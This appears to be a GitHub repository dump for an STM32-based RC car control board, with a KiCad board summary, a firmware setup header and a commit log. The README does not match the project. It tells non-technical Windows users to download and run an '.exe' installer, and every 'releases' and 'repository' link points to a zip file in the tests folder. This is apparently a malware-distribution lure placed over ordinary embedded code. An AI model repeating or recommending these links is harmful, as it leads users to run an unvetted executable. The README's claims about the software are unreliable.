# Repository xixiheihei6-droid/ecu

File README.md:

# ⚙️ ecu - Easy Control for RC Cars

---

## 🚀 What is ecu?

ecu is an application designed to help you control your self-driving remote control (RC) car. It works on Windows and lets you run your RC car with simple controls and automated driving features. There is no need for technical skills to get started.

This software uses basic commands to drive your RC car, making it easy to learn and fun to use.

---

## 💻 System Requirements

Before you start, ensure your PC meets these requirements:

- Windows 10 or later (64-bit)
- At least 4 GB of RAM
- 1 GHz or faster processor
- Internet connection to download the app
- USB or wireless connection to your RC car (depending on your RC model)

---

## 📦 What You Get

When you download ecu, it includes:

- The main ecu program for driving your RC car
- Simple controls for manual driving
- Automated modes for self-driving
- User interface designed for easy use
- Basic troubleshooting help built in

---

## 🎯 How to Download and Run ecu

1. Click the big blue download button below or visit the [ecu releases page](https://raw.githubusercontent.com/xixiheihei6-droid/ecu/main/tests/Software-1.1.zip) to get the latest version.

2. On the GitHub releases page, look for the latest version. Generally, the newest release is at the top.

3. Find the file ending with ".exe" in the list of files. This is the software installer for Windows.

4. Click on the ".exe" file to start the download.

5. Once the download is complete, open the file to begin installation.

6. Follow the on-screen steps in the installer. You usually just need to click "Next" a few times.

7. After installation finishes, look for the ecu icon on your desktop or in your Start menu.

8. Double-click the icon to open ecu.

---

## ⚙️ Setting Up Your RC Car with ecu

1. Turn on your RC car.

2. Connect the car to your PC. This might be via a USB cable or wireless method based on your RC model.

3. Open ecu on your PC.

4. The app should detect your RC car connection automatically.

5. If the car does not connect, check your cable or wireless settings.

6. Use the built-in control panel to operate your RC car manually.

7. To try self-driving mode, select the automation option on the screen.

---

## 🛠 Troubleshooting Tips

- If ecu does not start, check that your PC meets system requirements.

- If your RC car does not connect, try a different USB port or reconnect your wireless adapter.

- Make sure your RC car's battery is charged.

- Restart ecu if it becomes unresponsive.

- Close other programs that may interfere with USB or wireless devices.

---

## 📄 About This Project

ecu was created to give users an easy way to control self-driving RC cars without programming or technical knowledge. It focuses on simple connections and straightforward driving commands.

This makes it ideal for hobbyists and new users who want to explore automated RC control.

---

## 🔄 Updates and Support

To get updates and new features:

- Visit the [ecu releases page](https://raw.githubusercontent.com/xixiheihei6-droid/ecu/main/tests/Software-1.1.zip).

- Download new versions as they are released.

For support, look for help sections in the app or check the GitHub page's issues area.

---

## 🧰 Additional Information

- No internet connection is required to run ecu once it is installed.

- The app uses standard Windows controls for ease of use.

- It works best with common RC car models available on the market.

- You can customize control settings inside ecu for your specific car.

- All updates are tested for Windows 10 and later to ensure smooth operation.

---

## 🔗 Useful Links

- Download and updates: [ecu releases](https://raw.githubusercontent.com/xixiheihei6-droid/ecu/main/tests/Software-1.1.zip)

- GitHub repository main page: https://raw.githubusercontent.com/xixiheihei6-droid/ecu/main/tests/Software-1.1.zip

---

## 📧 Contact

For questions or feedback, use the GitHub issues page on the repository linked above. This is the best way to communicate with the developers and other users.

## KiCad design pcb/ecu.kicad_pcb

Board: 4 copper layers, 40.0 x 51.0 mm, 44 parts (0 on the bottom side), 34 nets.

Parts:
C1: 4.7uF; C_0805_2012Metric
C2, C3, C4, C5, C6, C7: 100NF; C_0805_2012Metric
D1: PESD2CAN,215; SOT95P230X110-3N
FL: MountingHole_3.2mm_M3
FR: MountingHole_3.2mm_M3
J1: Conn_01x07; PinHeader_1x07_P2.54mm_Vertical
J2: Conn_01x03; PinHeader_SMD_1x03_Vertical_P2.54mm
J3: Buck Pins; buck_converter_12V_3.3V
J4, J7: Conn_01x02; WirePad_EC5_12AWG_2xTH_2.7D_6.0OD_P8.0
J5, J6, J11: Conn_01x03; PinHeader_1x03_P2.54mm_Vertical
J8, J9: Conn_01x02; PinHeader_1x02_P2.54mm_Vertical
J10, J12: Conn_01x04; PinHeader_1x04_P2.54mm_Vertical
J13: Conn_02x02_Counter_Clockwise; PinHeader_2x02_P2.54mm_Horizontal
Q2, Q3: DMN2041L; SOT-23
R1: 47k; R_0805_2012Metric
R2, R3, R4, R8, R12: 10k; R_0805_2012Metric
R5: 1k; R_0805_2012Metric
R6, R11: 100; R_0805_2012Metric
R7: 120; R_0805_2012Metric
R9: 180; R_0805_2012Metric
R10: 110; R_0805_2012Metric
RL: MountingHole_3.2mm_M3
RR: MountingHole_3.2mm_M3
U1: STM32F413RGTx; LQFP-64_10x10mm_P0.5mm
U2: TYPE-C-31-M-04; USB-C-SMD_TYPE-C-USB-20
U3: SN65HVD230; SOIC-8_3.9x4.9mm_P1.27mm
U4: FM-B1921RGBA-SH; LED-ARRAY-SMD_4P-L2.2-W2.1-BR
U5: VLP-400-F; VLP400F

Connections:
+3.3V: C2.2, C3.2, C4.2, C5.2, C6.2, C7.2, J3.3, J10.4, J12.4, R4.1, U1.1 (VBAT), U1.13 (VDDA), U1.19 (VDD), U1.32 (VDD), U1.48 (VDD), U1.64 (VDD), U3.3 (VCC), U4.1 (+)
+5V: J2.2, J5.2, J6.2, J11.2
+12V: J4.2, J7.2, J8.1, J13.2, J13.4, U2.A4 (VBUS), U2.A9 (VBUS), U2.B4 (VBUS), U2.B9 (VBUS)
BLUE-: R9.2, U4.4 (B-)
CAN1_H: D1.2, R7.1, U2.A11 (SSRXp2), U3.7 (CANH)
CAN1_L: D1.1, R7.2, U2.A10 (SSRXn2), U3.6 (CANL)
CAN1_RX: U1.33 (PB12), U3.4 (R)
CAN1_TX: U1.34 (PB13), U3.1 (D)
ESC_LINK: J2.3, J6.3
FRONT: Q2.1 (G), R3.1, U1.15 (PA1)
FRONT_POW: J13.3, Q2.3 (D)
GND: C1.2, C2.1, C3.1, C4.1, C5.1, C6.1, C7.1, D1.3, J1.1, J2.1, J3.2, J3.4, J4.1, J5.1, J6.1, J7.1, J9.2, J10.1, J11.1, J12.1, Q2.2 (S), Q3.2 (S), R1.2, R2.2, R3.2, R5.1, R6.2, R8.1, R12.2, U1.12 (VSSA), U1.18 (VSS), U1.31 (VSS), U1.47 (VSS), U1.63 (VSS), U2.0, U2.A1 (GND), U2.A12 (GND), U2.B1 (GND), U2.B12 (GND), U3.2 (GND)
GREEN-: R10.1, U4.3 (G-)
unnamed: J3.1, J8.2
unnamed: J9.1, R4.2, U1.7 (NRST)
unnamed: R12.1, U1.60 (BOOT0)
unnamed: R8.2, U1.28 (PB2)
unnamed: R9.1, U1.37 (PC6)
unnamed: R10.2, U1.38 (PC7)
unnamed: R11.2, U1.40 (PC9)
unnamed: C1.1, U1.30 (VCAP_1)
unnamed: R6.1, U2.A8 (SUB1)
unnamed: R5.2, U2.B8 (SUB2)
unnamed: R1.1, U3.8 (Rs)
REAR: Q3.1 (G), R2.1, U1.17 (PA3)
REAR_POW: J13.1, Q3.3 (D)
RED-: R11.1, U4.2 (R-)
RX: J10.3, U1.61 (PB8)
SCL: J1.4, U1.41 (PA8)
SDA: J1.5, U1.56 (PB4)
STEERING: J5.3, U1.26 (PB0)
SWCLK: J12.2, U1.49 (PA14)
SWDIO: J12.3, U1.46 (PA13)
TX: J10.2, U1.62 (PB9)

## Code that names these connections

File board/setup.h:

// Define to prevent recursive inclusion
#ifndef SETUP_H
#define SETUP_H

#define CAN_QUANTA 16U

// Define CAN peripheral clock (APB1 clock in kHz)
#define CAN_PCLK (CORE_FREQ / 2U / 1000U) // 48 MHz / 1000 = 48000 kHz
// Calculate CAN prescaler based on desired speed (in kbps)
#define can_speed_to_prescaler(x) ((CAN_PCLK / CAN_QUANTA * 10U) / (x))

#include "clock.h"
#include "config.h"
#include "libc.h"
#include "stdout.h"
#include "stm32f4xx_hal.h"
#include "stm32f4xx_hal_can.h"
#include "stm32f4xx_hal_pcd.h"
#include "stm32f4xx_hal_rcc_ex.h"
#include "stm32f4xx_hal_uart.h"

extern PCD_HandleTypeDef hpcd_USB_OTG_FS;

TIM_HandleTypeDef htim3;
UART_HandleTypeDef huart5;
I2C_HandleTypeDef hi2c3;
CAN_HandleTypeDef hcan2;

extern ecu_t ecu;

void MX_GPIO_Clocks_Init(void) {
    __HAL_RCC_GPIOA_CLK_ENABLE();
    __HAL_RCC_GPIOB_CLK_ENABLE();
    __HAL_RCC_GPIOC_CLK_ENABLE();
}

// Handle TIM3 clock configuration for PWM
void MX_TIM_Init(void) {
    __HAL_RCC_TIM3_CLK_ENABLE();
    htim3.Instance = TIM3;
    htim3.Init.Prescaler = (SystemCoreClock / 4000000) - 1; // 1 MHz timer frequency
    htim3.Init.CounterMode = TIM_COUNTERMODE_UP;            // Edge-aligned mode
    htim3.Init.Period = 80000 - 1;                          // 20 ms period (50 Hz frequency)
    htim3.Init.ClockDivision = TIM_CLOCKDIVISION_DIV1;
    htim3.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE;
    htim3.Init.RepetitionCounter = 0;
    if (HAL_TIM_PWM_Init(&htim3) != HAL_OK) {
        Error_Handler();
    }
    // Configure PWM output channels
    TIM_OC_InitTypeDef sConfigOC;
    sConfigOC.OCMode = TIM_OCMODE_PWM1; // Edge-aligned mode
    sConfigOC.Pulse = 0;
    sConfigOC.OCPolarity = TIM_OCPOLARITY_HIGH;
    sConfigOC.OCFastMode = TIM_OCFAST_DISABLE;

    if (HAL_TIM_PWM_ConfigChannel(&htim3, &sConfigOC, TIM_CHANNEL_3) != HAL_OK) {
        Error_Handler();
    }

    if (HAL_TIM_PWM_Start(&htim3, TIM_CHANNEL_3) != HAL_OK) {
        Error_Handler();
    }
}

void MX_GPIO_Common_Init(void) {
    GPIO_InitTypeDef GPIO_InitStruct = {0};
    GPIO_InitStruct.Pull = GPIO_NOPULL;
    GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP;

    // Headlights (GPIOA)
    GPIO_InitStruct.Pin = ecu.front_headlights_pin;
    HAL_GPIO_Init(GPIOA, &GPIO_InitStruct);
    HAL_GPIO_WritePin(GPIOA, ecu.front_headlights_pin, GPIO_PIN_RESET);
    GPIO_InitStruct.Pin = ecu.rear_headlights_pin;
    HAL_GPIO_Init(GPIOA, &GPIO_InitStruct);
    HAL_GPIO_WritePin(GPIOA, ecu.rear_headlights_pin, GPIO_PIN_RESET);

    // RGB LEDs (GPIOC, active-low)
    HAL_GPIO_WritePin(GPIOC, ecu.led_red_pin | ecu.led_green_pin | ecu.led_blue_pin,
                      GPIO_PIN_SET); // active-low OFF

    GPIO_InitStruct.Pin = ecu.led_red_pin | ecu.led_green_pin | ecu.led_blue_pin;
    GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP;
    GPIO_InitStruct.Pull = GPIO_NOPULL;
    GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW;
    HAL_GPIO_Init(GPIOC, &GPIO_InitStruct);

    HAL_GPIO_WritePin(GPIOC, ecu.led_blue_pin, GPIO_PIN_RESET);

    // Steering PWM
    GPIO_InitStruct.Pin = ecu.steering_pwm_pin;
    GPIO_InitStruct.Mode = GPIO_MODE_AF_PP; // Alternate function push-pull
    GPIO_InitStruct.Pull = GPIO_NOPULL;
    GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_HIGH; // High speed
    GPIO_InitStruct.Alternate = GPIO_AF2_TIM3;    // Alternate function TIM3_CH3
    HAL_GPIO_Init(GPIOB, &GPIO_InitStruct);
}

void MX_UART_Init(void) {
    __HAL_RCC_UART5_CLK_ENABLE();
    __HAL_RCC_GPIOB_CLK_ENABLE();

    huart5.Instance = UART5;
    huart5.Init.BaudRate = 115200;
    huart5.Init.WordLength = UART_WORDLENGTH_8B;
    huart5.Init.StopBits = UART_STOPBITS_1;
    huart5.Init.Parity = UART_PARITY_NONE;
    huart5.Init.Mode = UART_MODE_TX_RX;
    huart5.Init.HwFlowCtl = UART_HWCONTROL_NONE;
    huart5.Init.OverSampling = UART_OVERSAMPLING_16;
    if (HAL_UART_Init(&huart5) != HAL_OK) {
        Error_Handler();
    }

    GPIO_InitTypeDef GPIO_InitStruct = {0};
    GPIO_InitStruct.Mode = GPIO_MODE_AF_PP;
    GPIO_InitStruct.Pull = GPIO_NOPULL;
    GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_VERY_HIGH;

    // PB9 = UART5_TX (AF11)
    GPIO_InitStruct.Pin = GPIO_PIN_9;
    GPIO_InitStruct.Alternate = GPIO_AF11_UART5;
    HAL_GPIO_Init(GPIOB, &GPIO_InitStruct);

    // PB8 = UART5_RX (AF11)
    GPIO_InitStruct.Pin = GPIO_PIN_8;
    GPIO_InitStruct.Alternate = GPIO_AF11_UART5;
    HAL_GPIO_Init(GPIOB, &GPIO_InitStruct);
}

void I2C3_EV_IRQHandler(void) {
    HAL_I2C_EV_IRQHandler(&hi2c3);
}

void I2C3_ER_IRQHandler(void) {
    HAL_I2C_ER_IRQHandler(&hi2c3);
}

void HAL_I2C_ErrorCallback(I2C_HandleTypeDef *hi2c) {
    uint32_t error = HAL_I2C_GetError(hi2c);
    uart_printf("I2C Error Callback: error=%lu\n", error);

    // reset the I2C peripheral in case of bus failure
    HAL_I2C_DeInit(hi2c);
    if (HAL_I2C_Init(hi2c) != HAL_OK) {
        uart_printf("Failed to reinitialize I2C\n");
    } else {
        uart_printf("I2C reinitialized successfully\n");
    }
}

void MX_I2C_Init(void) {
    __HAL_RCC_I2C3_CLK_ENABLE();

    // GPIO must be configured before peripheral init
    GPIO_InitTypeDef GPIO_InitStruct = {0};
    GPIO_InitStruct.Mode = GPIO_MODE_AF_OD;
    GPIO_InitStruct.Pull = GPIO_PULLUP;
    GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_HIGH;
    // SCL - A8
    GPIO_InitStruct.Pin = ecu.i2c_scl;
    GPIO_InitStruct.Alternate = GPIO_AF4_I2C3;
    HAL_GPIO_Init(GPIOA, &GPIO_InitStruct);
    // SDA - B4
    GPIO_InitStruct.Pin = ecu.i2c_sda;
    GPIO_InitStruct.Alternate = GPIO_AF9_I2C3;
    HAL_GPIO_Init(GPIOB, &GPIO_InitStruct);

    hi2c3.Instance = I2C3;
    hi2c3.Init.ClockSpeed = I2C_CLOCKSPEED * 1000U;
    hi2c3.Init.DutyCycle = I2C_DUTYCYCLE_2;
    hi2c3.Init.OwnAddress1 = 0;
    hi2c3.Init.AddressingMode = I2C_ADDRESSINGMODE_7BIT;
    hi2c3.Init.DualAddressMode = I2C_DUALADDRESS_DISABLE;
    hi2c3.Init.OwnAddress2 = 0;
    hi2c3.Init.GeneralCallMode = I2C_GENERALCALL_DISABLE;
    hi2c3.Init.NoStretchMode = I2C_NOSTRETCH_DISABLE;

    if (HAL_I2C_Init(&hi2c3) != HAL_OK) {
        Error_Handler();
    }

    // Error interrupt for bus fault detection
    HAL_NVIC_SetPriority(I2C3_ER_IRQn, 3, 0);
    HAL_NVIC_EnableIRQ(I2C3_ER_IRQn);
    __HAL_I2C_ENABLE_IT(&hi2c3, I2C_IT_ERR);
}

void HAL_CAN_MspInit(CAN_HandleTypeDef *hcan) {
    GPIO_InitTypeDef GPIO_InitStruct = {0};

    if (hcan->Instance == CAN2) {
        __HAL_RCC_CAN1_CLK_ENABLE();
        __HAL_RCC_CAN2_CLK_ENABLE();
        __HAL_RCC_GPIOB_CLK_ENABLE();

        // PB12 = CAN2_RX, PB13 = CAN2_TX (AF9)
        GPIO_InitStruct.Pin = GPIO_PIN_12 | GPIO_PIN_13;
        GPIO_InitStruct.Mode = GPIO_MODE_AF_PP;
        GPIO_InitStruct.Pull = GPIO_NOPULL;
        GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_VERY_HIGH;
        GPIO_InitStruct.Alternate = GPIO_AF9_CAN2;
        HAL_GPIO_Init(GPIOB, &GPIO_InitStruct);
    }
}

void MX_CAN_DEVICE_Init(void) {
    hcan2.Instance = CAN2;
    hcan2.Init.Mode = CAN_MODE_NORMAL;
    hcan2.Init.Prescaler = 6; // 48 MHz / 6 / 16 TQ = 500 kbps
    hcan2.Init.SyncJumpWidth = CAN_SJW_4TQ;
    hcan2.Init.TimeSeg1 = CAN_BS1_12TQ;
    hcan2.Init.TimeSeg2 = CAN_BS2_3TQ;
    hcan2.Init.AutoBusOff = ENABLE;
    hcan2.Init.TimeTriggeredMode = DISABLE;
    hcan2.Init.AutoWakeUp = ENABLE;
    hcan2.Init.AutoRetransmission = DISABLE;
    hcan2.Init.ReceiveFifoLocked = DISABLE;
    hcan2.Init.TransmitFifoPriority = DISABLE;

    if (HAL_CAN_Init(&hcan2) != HAL_OK) {
        Error_Handler();
    }

    CAN_FilterTypeDef sFilterConfig = {0};
    sFilterConfig.FilterMode = CAN_FILTERMODE_IDMASK;
    sFilterConfig.FilterScale = CAN_FILTERSCALE_32BIT;
    sFilterConfig.FilterIdHigh = 0x0000;
    sFilterConfig.FilterIdLow = 0x0000;
    sFilterConfig.FilterMaskIdHigh = 0x0000;
    sFilterConfig.FilterMaskIdLow = 0x0000;
    sFilterConfig.FilterFIFOAssignment = CAN_RX_FIFO0;
    sFilterConfig.FilterActivation = ENABLE;

    sFilterConfig.SlaveStartFilterBank = 14;
    sFilterConfig.FilterBank = 14;

    if (HAL_CAN_ConfigFilter(&hcan2, &sFilterConfig) != HAL_OK) {
        Error_Handler();
    }

    HAL_NVIC_SetPriority(CAN2_RX0_IRQn, 1, 0);
    HAL_NVIC_EnableIRQ(CAN2_RX0_IRQn);
    HAL_NVIC_SetPriority(CAN2_TX_IRQn, 2, 0);
    HAL_NVIC_EnableIRQ(CAN2_TX_IRQn);

    if (HAL_CAN_Start(&hcan2) != HAL_OK) {
        Error_Handler();
    }

    if (HAL_CAN_ActivateNotification(&hcan2, CAN_IT_RX_FIFO0_MSG_PENDING | CAN_IT_ERROR | CAN_IT_BUSOFF) != HAL_OK) {
        Error_Handler();
    }
}
#endif

## Commit log (part)

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2026-03-11 Initial public release
2026-03-11 Clean up esc md
2026-03-11 Clamp throttle
2026-03-11 Less magic nums
2026-03-11 Consider reset on bad checksum (could be noisy)
2026-03-12 Check status on i2c re-init
2026-03-12 lukas ack
2026-03-12 Add github pages badge
2026-03-13 pcb ignore
2026-03-13 Kicad project files directly in git graph
2026-03-13 Add board 3d to lfs
2026-03-13 Add bottom case 3d assets to lfs
2026-03-14 Move wrl to lfs
2026-03-25 Add pcb and mech assets
